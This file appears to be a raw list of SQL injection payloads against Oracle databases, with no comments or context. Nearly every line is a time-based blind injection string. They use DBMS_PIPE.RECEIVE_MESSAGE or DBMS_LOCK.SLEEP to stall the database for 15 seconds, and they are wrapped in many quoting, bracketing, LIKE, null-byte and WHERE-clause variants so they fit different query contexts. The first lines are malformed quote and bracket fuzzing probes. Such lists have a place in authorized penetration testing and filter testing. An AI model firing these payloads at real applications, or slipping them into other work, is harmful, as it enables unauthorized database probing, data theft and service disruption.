''(""'((.)
'wgEi<'">aqdV
) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)
') AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)
' AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)
" AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)
) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (6230=6230
)) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ((8120=8120
))) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (((6143=6143
 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)
') AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ('DmkT'='DmkT
')) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (('XDaR'='XDaR
'))) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ((('rXAt'='rXAt
' AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND 'VTcd'='VTcd
') AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ('WAFn' LIKE 'WAFn
')) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (('sXrA' LIKE 'sXrA
'))) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ((('hjSQ' LIKE 'hjSQ
' AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND 'wWPZ' LIKE 'wWPZ
") AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ("Ndrm"="Ndrm
")) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (("eJSB"="eJSB
"))) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ((("Nykk"="Nykk
" AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND "XGBc"="XGBc
") AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ("ZaKp" LIKE "ZaKp
")) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (("cLld" LIKE "cLld
"))) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ((("Puss" LIKE "Puss
" AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND "iEDu" LIKE "iEDu
%') AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ('%'='
%')) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (('%'='
%'))) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ((('%'='
%' AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND '%'='
%") AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ("%"="
%")) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (("%"="
%"))) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ((("%"="
%" AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND "%"="
%00') AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ('tZAq'='tZAq
%00')) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND (('ONxZ'='ONxZ
%00'))) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND ((('SPCF'='SPCF
%00' AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15) AND 'EQWR'='EQWR
 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- TLQf
 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)# THbo
') WHERE 4105=4105 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
") WHERE 4919=4919 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
) WHERE 5662=5662 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
' WHERE 5452=5452 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
" WHERE 1842=1842 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
 WHERE 7181=7181 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
')) AS Ndbd WHERE 7904=7904 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
")) AS Kcfq WHERE 1499=1499 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
)) AS zkUj WHERE 8828=8828 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
') AS HAsI WHERE 2504=2504 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
") AS PBYj WHERE 7207=7207 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
) AS dymc WHERE 8119=8119 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)-- 
'||(SELECT 'mMBB' FROM DUAL WHERE 2659=2659 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15))||'
'||(SELECT 'pngK' WHERE 6263=6263 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15))||'
'+(SELECT RIHV WHERE 6621=6621 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15))+'
'+(SELECT 'FkBQ' WHERE 7467=7467 AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15))+'
' IN BOOLEAN MODE) AND 6109=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(112)||CHR(82)||CHR(73),15)#
) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
') AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
' AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
" AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
)) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
))) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
')) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
'))) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
") AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
")) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
"))) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%') AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%')) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%'))) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%' AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%") AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%")) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%"))) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%" AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%00') AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%00')) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%00'))) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
%00' AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
') WHERE 2740=2740 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
") WHERE 3515=3515 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
) WHERE 4638=4638 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
' WHERE 3908=3908 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
" WHERE 7913=7913 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
 WHERE 8666=8666 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
')) AS FCkp WHERE 4176=4176 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
")) AS CWgt WHERE 1958=1958 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
)) AS mrrz WHERE 7985=7985 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
') AS OUOh WHERE 9255=9255 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
") AS hyfN WHERE 1281=1281 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
) AS Vhkc WHERE 8341=8341 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
'||(SELECT 'hYcF' FROM DUAL WHERE 1141=1141 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
'||(SELECT 'TtKm' WHERE 8013=8013 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
'+(SELECT NPJJ WHERE 4838=4838 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
'+(SELECT 'ueIB' WHERE 4915=4915 AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
' IN BOOLEAN MODE) AND 3135=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(113)||CHR(110),15)--
BEGIN IF (7983=7983) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
(SELECT (CASE WHEN (1214=1214) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(80)||CHR(122)||CHR(100),15) ELSE 1214 END) FROM DUAL)
',(BEGIN IF (7247=7247) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
,(BEGIN IF (7247=7247) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
',(SELECT (CASE WHEN (9180=9180) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(105)||CHR(80)||CHR(70),15) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (9180=9180) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(105)||CHR(80)||CHR(70),15) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
